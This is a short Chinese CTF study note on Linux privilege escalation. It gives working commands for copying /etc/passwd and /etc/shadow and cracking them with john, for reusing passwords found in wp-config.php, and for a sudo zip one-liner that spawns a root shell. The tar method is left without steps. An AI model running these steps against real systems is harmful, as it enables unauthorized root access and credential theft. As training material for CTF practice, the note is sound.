我的CTF学习与教学之旅笔记11

路径遍历(提权root权限)web安全提权

查看发行版本:/etc/issue、/etc/*-release、uname -a

如:searchsploit Ubuntu 12.04.5        查找载荷

如果有合适的载荷,则可以进行内核溢出,否则不行

提权方法一:**linux用户密码步骤:

获取到/etc/passwd、/etc/shadow到本地。通常meterpreter的download命令可以下载这两个文件

unshadow passwd shadow > cracked    

john craked

至此,完成用户密码**

提权方法二:(我并不常用,掌握的不好)利用用户的定时任务

我的CTF学习与教学之旅笔记11

提权方法三:密码复用,找到一些配置文件,查看是否有密码

低权限用户执行sudo -l   进行提权,需要密码,这时我们需要考虑浏览机器上有哪些web应用

如找到wordpress应用,尝试找到这个应用的配置文件wp-config.php,里面有可能用户名和密码

可以用这个用户和密码,利用ssh远程登录靶机

使用sudo -l 查看当前用户可以使用root提权的命令信息 

发现zip tar命令是有root权限的,且不用密码

则利用如下步骤题提权:

方法一:zip

touch exploit

sudo -u root zip exploit.zip exploit -T --unzip-command="sh -c /bin/bash"执行后可以提升到root权限

方法二:tar

我的CTF学习与教学之旅笔记11